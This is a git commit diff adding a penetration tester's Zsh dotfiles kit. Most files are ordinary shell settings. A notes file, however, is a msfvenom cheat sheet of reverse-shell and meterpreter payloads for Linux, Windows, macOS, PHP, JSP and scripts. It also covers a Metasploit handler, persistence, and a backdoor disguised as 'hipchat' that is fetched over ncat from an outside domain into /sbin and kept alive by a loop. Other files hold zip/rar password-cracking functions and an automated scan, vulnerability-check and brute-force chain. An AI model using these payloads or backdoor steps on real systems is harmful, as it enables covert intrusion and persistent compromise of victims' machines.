anti-chaos update, test version

master
user 2017-01-12 20:41:16 +01:00
parent 51629b5b0a
commit 0fd2b3df2f
20 changed files with 580 additions and 0 deletions

BIN
.README.md.un~ 100755

Binary file not shown.

0
LICENSE 100644 → 100755
View File

42
README.md 100644 → 100755
View File

@ -1 +1,43 @@
Penetration Tester's Zsh - functions 4 fast pawn
Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also.
Installing after you have the dependencies: cp profile_files/.* -R ~/
Functions
=========
pawnpls - Automatically enumerate and start predefined attacks such as brute force.
Example for single target: autopawn n0nexi-stent.com
Example for multiple targets: autopawn "n0nex-1.com n0nex-2.com"
everythingworksornot\? - check if everything works or not for this script
chk functions
=============
chkhttpz - HTTP response check
Example: chkhttpz itsec.lu 443
chkcrt - SSL certificate dump
Example: chkcrt gentoo.org 443
cracking functions
==================
johnzip - Crack zip files using john
Example: johnzip data.zip rockyou.txt
johnrar - Crack rar files using john
Example: johnrar data.rar rockyou.txt
help functions
==============
hlp - Get help of the hlp command
hlprnd - Get random strings (lengths: 8,16,32,64)

43
README.md~ 100755
View File

@ -0,0 +1,43 @@
Penetration Tester's Zsh - functions 4 fast pawn
Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also.
Installing after you have the dependencies: cp profile_files/.* -R ~/
Functions
=========
pawnpls - Automatically enumerate and start predefined attacks such as brute force.
Example for single target: autopawn 127.0.0.1
Example for multiple targets: autopawn "127.0.0.1 127.0.0.2"
everythingworksornot\? - check if everything works or not for this script
chk functions
=============
chkhttpz - HTTP response check
Example: chkhttpz itsec.lu 443
chkcrt - SSL certificate dump
Example: chkcrt gentoo.org 443
cracking functions
==================
johnzip - Crack zip files using john
Example: johnzip data.zip rockyou.txt
johnrar - Crack rar files using john
Example: johnrar data.rar rockyou.txt
help functions
==============
hlp - Get help of the hlp command
hlprnd - Get random strings (lengths: 8,16,32,64)

View File

@ -0,0 +1,6 @@
set linenumbers
set brackets ""')>]}"
set matchbrackets "(<[{)>]}"
set nohelp
set mouse
set smooth

View File

@ -0,0 +1,126 @@
C0nn3ctz msfvenom payload backdoor veil
List payloads
msfvenom -l
# The script way to make life more simple
theip=0.0.0.0
theport=443
Binaries and libs
=================
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf
msfvenom -p linux/x64/shell/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f exe > shell.exe
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # STAGED, use this with msf
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # NON-STAGED
msfvenom -p windows/x64/exec cmd="cmd /c calc.exe" -f dll > d3d9.dll
msfvenom -p windows/exec CMD="cmd /c calc.exe" -f dll > d3d9.dll
msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$theip LPORT=$theport
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f macho > shell.macho
Web Payloads
============
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f war > shell.war
JavaScript
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1 -f js_le
Scripting Payloads
==================
Python
msfvenom -p cmd/unix/reverse_python LHOST=$theip LPORT=$theport -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=$theip LPORT=$theport -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=$theip LPORT=$theport -f raw > shell.pl # For Linux
msfvenom -p cmd/windows/reverse_perl=$theip LPORT=$theport -f raw > shell.pl # For Windows
Shellcode
=========
For all shellcode see msfvenom help-formats for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f <language>
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=443 -f c
msfvenom -p windows/shell/bind_tcp -f perl --smallest # Default port is 4444 and with --smallest msfvenom tries to make it small
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f <language>
Handler
=======
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD cmd/windows/powershell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 443
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler msfconsole -L -r
Persistence
===========
meterpreter > run persistence
UUID Payload
============
# Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp_uuid LHOST=domainzz.com  LPORT=53 PayloadUUIDTracking=true PayloadUUIDName=HAXHAXHAXHAX -f elf > hipchat
# Setup msf listener
set payload linux/x86/meterpreter/reverse_tcp_uuid
set payloadUUIDName HAXHAXHAXHAX
set PayloadUUIDTracking true
run -j 
# Move to vict
cat hipchat.elf |ncat --ssl -lvp 53
nc --ssl domainzz.com 53 > /sbin/lister
chmod +x /sbin/lister
# crontab alternatively:
if ps aux|grep /sbin/hipchat |grep -v grep; then sleep 1 ; else /sbin/hipchat ; fi

View File

@ -0,0 +1,37 @@
C0nn3ctz sniffing wireshark network
IP address
ip.addr == 192.168.1.1
ip.src == 192.168.1.1
ip.dst == 192.168.1.1
Show only tcp port 110
tcp.port eq 110
Show only tcp and udp port 110
tcp.port eq 110 || udp.port eq 110
Follow TCP stream
tcp.stream eq 0
Show only TCP
tcp
Show only ARP
arp
Show only HTTP
http
Show only HTTP or ARP
http||arp
HTTP and ip.src
http&&ip.src==192.168.1.4
HTTP POST
http:.request.method == "POST"
etc
(ip.addr==192.168.1.0/24) and (ip.src!=192.168.1.2)and (ip.dst!=192.168.1.4)

View File

@ -0,0 +1,4 @@
syntax on
set nu
set backspace=indent,eol,start
set tabstop=4 shiftwidth=4 expandtab

Binary file not shown.

View File

@ -0,0 +1,10 @@
#!/usr/bin/python2.7
with open('2_ports_and_service_top1000_on_alive_hosts.out') as f:
curip=""
for curline in f:
if "Nmap scan report for " in curline:
curip=curline
curip=curip[21:]
if "open" in curline:
print curip.strip('\n') + " " + curline.strip('\n')

View File

@ -0,0 +1,2 @@
alias py='python'
alias pl='perl'

View File

@ -0,0 +1,13 @@
bindkey "^K" kill-whole-line
bindkey "${terminfo[khome]}" beginning-of-line
bindkey "${terminfo[kend]}" end-of-line
bindkey "\e[3~" delete-char
bindkey -v
bindkey '^R' history-incremental-search-backward
bindkey '^T' history-incremental-search-backward
# Jumping with ctrl+arrows
bindkey "^[[1;5C" forward-word
bindkey "^[[1;5D" backward-word

View File

@ -0,0 +1,17 @@
autoload colors; colors
# The variables are wrapped in %{%}. This should be the case for every variable that does not contain space.
for COLOR in RED GREEN YELLOW BLUE MAGENTA CYAN BLACK WHITE; do
eval PR_$COLOR='%{$fg_no_bold[${(L)COLOR}]%}'
eval PR_BOLD_$COLOR='%{$fg_bold[${(L)COLOR}]%}'
done
eval RESET='$reset_color'
export PR_RED PR_GREEN PR_YELLOW PR_BLUE PR_WHITE PR_BLACK
export PR_BOLD_RED PR_BOLD_GREEN PR_BOLD_YELLOW PR_BOLD_BLUE
export PR_BOLD_WHITE PR_BOLD_BLACK
# Clear LSCOLORS
unset LSCOLORS
export CLICOLOR=1
export LS_COLORS=exfxcxdxbxegedabagacad

View File

@ -0,0 +1,2 @@
autoload -U compinit && compinit
zmodload -i zsh/complist

View File

@ -0,0 +1,22 @@
function extract {
echo Running extract on $1 ...
if [ -f $1 ] ; then
case $1 in
*.tar.bz2) tar xjf $1 ;;
*.tar.gz) tar xzf $1 ;;
*.bz2) bunzip2 $1 ;;
*.rar) unrar x $1 ;;
*.gz) gunzip $1 ;;
*.tar) tar xf $1 ;;
*.tbz2) tar xjf $1 ;;
*.tgz) tar xzf $1 ;;
*.zip) unzip $1 ;;
*.Z) uncompress $1 ;;
*.7z) 7z x $1 ;;
*.xz) unxz $1 ;;
*) echo "'$1' cannot be extracted via extract()" ;;
esac
else
echo "'$1' is not a valid file"
fi
}

View File

@ -0,0 +1 @@
# Not saving history by default

View File

@ -0,0 +1,200 @@
function everythingworksornot"?" {
echo "really?"
}
function ton {
. torsocks on
}
function tof {
. torsocks off
}
function chkhttpz {
echo "HTTP responses"
wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/"
echo "\nHTTPS responses"
wget --spider -S "https://$1:$2/" 2>&1 | grep "HTTP/"
}
function chkcrt {
openssl s_client -showcerts -connect $1:$2
}
function hlp {
echo "You can get help from the following topics:"
for f in ~/.ptz/v3das/* ; do
echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1
done
}
function hlprnd {
cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-8};echo;
cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo;
cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-32};echo;
cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-64};echo;
}
function johnzip {
if [ $# -ne 2 ]
then
echo "Usage $0 <zipfile> <wordlist>"
return
fi
echo "Unzip test..."
unzip -l $1
echo "Cracking...."
for i in $(john --wordlist=$2 --rules --stdout)
do
echo -ne "\rtrying \"$i\" "
unzip -o -P $i $1 >/dev/null 2>&1
STATUS=$?
if [ $STATUS -eq 0 ]; then
echo -e "\nArchive password is: \"$i\""
return
fi
done
}
function johnrar {
if [ $# -ne 2 ]
then
echo "Usage $0 <rarfile> <wordlist>"
else
rar l $1
echo "Cracking...."
john --wordlist=$2 --rules --stdout | while read i
do
echo -ne "\rtrying \"$i\" "
rar e -o+ -inul -p$i $1 >/dev/null
STATUS=$?
if [ $STATUS -eq "0" ]; then
echo -e "\nArchive password is: \"$i\""
return
fi
done
fi
}
function pawnpls {
amir00t=$(whoami)
if [ "$amir00t" != "root" ]
then
echo "pawnpls needs root in order to be effective (eg. for nmap -sS scans)."
return
fi
if [ $# -ne 1 ]
then
echo "Are you sure? You need to specify a target. Be careful. This runs out of tor also, even if you have torsocks ;)"
return
fi
# Pass to the scan function, no active attacks, just scanning
pawnpls_tof_target=$1
dns_enum_tof
scan_enum_tof
active_attack_tof
}
function dns_enum_tof {
. torsocks off
dnstarg=($pawnpls_tof_target)
cdate=$(date +"%Y-%m-%d-%H%M")
dettmpfold="~/.ptz/result-scan-$cdate"
mkdir -p $sctmpfold
cd $sctmpfold
theharvester -d $pawnpls_tof_target -b all -v > 1_harvester_$pawnpls_tof_target.txt
}
function scan_enum_tof {
. torsocks off
# Variables
targetx=($pawnpls_tof_target) # Space delimited!
ports=(21-23,25-26,53,80-81,110-111,113,135,139,143,179,199,443,445,465,514-515,548,554,587,646,993,995,1025-1027,1433,1720,1723,2000-2001,3306,3389,4443,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154,11211)
# Initialize directory and naming structure
cdate=$(date +"%Y-%m-%d-%H%M")
sctmpfold="~/.ptz/result-scan-$cdate"
mkdir -p $sctmpfold
cd $sctmpfold
touch scan_history.txt
echo "---- Starting AgroScanner ----" >> scan_history.txt
# Start with standard alive scan and check ports on alive hosts
# Get alive hosts
echo "Starting alive host enumeration..."
echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting alive hosts scan." >> scan_history.txt
nmap --randomize-hosts -sn -PS$ports $targetx -oG 1_alive_hosts.out
alive_hosts=$(grep "Status: Up" 1_alive_hosts.out | cut -d' ' -f2 | tr '\r\n' ' ')
echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished alive hosts scan. Found hosts: " $alive_hosts >> scan_history.txt
echo "Starting port scans on alive hosts..."
# Port scanning on alive hosts and version detection
echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting port scans on alive hosts with top 1000." >> scan_history.txt
nmap --randomize-hosts -sS -sV -n -Pn --top-ports 1000 $targetx > 2_ports_and_service_top1000_on_alive_hosts.out
python ~/.zsh/agro_detection_parser.py | sed -n '/ /s/ \+/ /gp' > 3_ip_port_service.out
number_open_tcp_ports=$(grep -v "Nmap scan report for" 3_ip_port_service.out |wc -l) # It lists all ports, even unknown and faster to grep from here for this.
echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished port scans on alive hosts with top 1000. Number of open ports: " $number_open_tcp_ports >> scan_history.txt
# Run UDP scan on most common ports
echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting UDP scans." >> scan_history.txt
nmap -sU --top-ports 50 $targetx > 4_udpscan.out
number_open_udp_ports=$(grep "open" 4_udpscan.out |wc -l)
echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished UDP scans. Number of open UDP ports: " $number_open_udp_ports >> scan_history.txt
echo "Starting nmap nse vulnerability scanning..."
# Vulnerability scanning
echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting simple vulnerbility scans." >> scan_history.txt
nmap -n -p 21 --script=ftp-anon.nse $targetx > 5_nmap_script_ftpanon.txt
nmap -sU -sS --script smb-enum-* -p U:137,T:139 $targetx > 6_nmap_sbm_nse_scan.txt # There is issue with the * askterisk... should be escaped or something
nmap -sS -n -p $ports --script=default,safe,vuln $targetx > 7_nmap_script_default-safe-vuln_scan.txt
echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished vulnerability scans. Lists are in the relevant txt files." >> scan_history.txt
echo $(date +"%Y-%m-%d-%H-%M-%S") " Started scan for automatic searchsploit." >> scan_history.txt
# for searchsploit, but nmap should be configured to scan with xml, default is top 1000
nmap -sS -sV -sC -O --host-timeout=5m --max-hostgroup=1 -Pn $targetx -oA 8_nmap_for_searchsploit
searchsploit -v --nmap 8_nmap_for_searchsploit.xml > 9_searchslpoit_results.txt
echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished the searchsploit queries. Outputs are in the relevant files." >> scan_history.txt
}
function active_attack_tof {
. torsocks off
cdate=$(date +"%Y-%m-%d-%H%M")
aatmpfold="~/.ptz/result-attack-$cdate"
mkdir -p $aatmpfold
cd $aatmpfold
# Preconfs
hydrabruteprotocol=(cvs firebird icq irc ldap nntp oracle-listener oracle-sid pcanywhere pcnfs postgres rdp redis rtsp ssh sip teamspeak vmauthd)
usernames="/usr/share/nmap/nselib/data/usernames.lst"
passwords="/usr/share/nmap/nselib/data/passwords.lst"
}

View File

@ -0,0 +1,37 @@
function git_prompt_info {
local ref=$(=git symbolic-ref HEAD 2> /dev/null)
local gitst="$(=git status 2> /dev/null)"
if [[ -f .git/MERGE_HEAD ]]; then
if [[ ${gitst} =~ "unmerged" ]]; then
gitstatus=" %{$fg[red]%}unmerged%{$reset_color%}"
else
gitstatus=" %{$fg[green]%}merged%{$reset_color%}"
fi
elif [[ ${gitst} =~ "Changes to be committed" ]]; then
gitstatus=" %{$fg[blue]%}!%{$reset_color%}"
elif [[ ${gitst} =~ "use \"git add" ]]; then
gitstatus=" %{$fg[red]%}!%{$reset_color%}"
elif [[ -n `git checkout HEAD 2> /dev/null | grep ahead` ]]; then
gitstatus=" %{$fg[yellow]%}*%{$reset_color%}"
else
gitstatus=''
fi
if [[ -n $ref ]]; then
echo "%{$fg_bold[green]%}/${ref#refs/heads/}%{$reset_color%}$gitstatus"
fi
}
function trso {
trsochk=$(/usr/bin/torsocks show|grep libtorsocks.so)
if [[ -z $(/usr/bin/torsocks show|grep libtorsocks.so) ]]
then
trchkres="%{$fg[yellow]%}tof"
else
trchkres="%{$fg[red]%}ton"
fi
echo $trchkres
}
PROMPT='%{$fg[red]%}$(whoami)%{$reset_color%}.ptz $(trso)%{$reset_color%} %~%<< $(git_prompt_info) ${PR_BOLD_WHITE}>%{${reset_color}%} '

View File

@ -0,0 +1,4 @@
setopt AUTO_CD
setopt COMPLETE_IN_WORD
setopt ALWAYS_TO_END
setopt PROMPT_SUBST

View File

@ -0,0 +1,14 @@
source ~/.zsh/colors.zsh
source ~/.zsh/setopt.zsh
source ~/.zsh/prompt.zsh
source ~/.zsh/completion.zsh
source ~/.zsh/aliases.zsh
source ~/.zsh/bindkeys.zsh
source ~/.zsh/functions.zsh
source ~/.zsh/general_functions.zsh
source ~/.zsh/pentest_functions.zsh
source ~/.zsh/history.zsh
zstyle ':completion:*' menu select
. torsocks on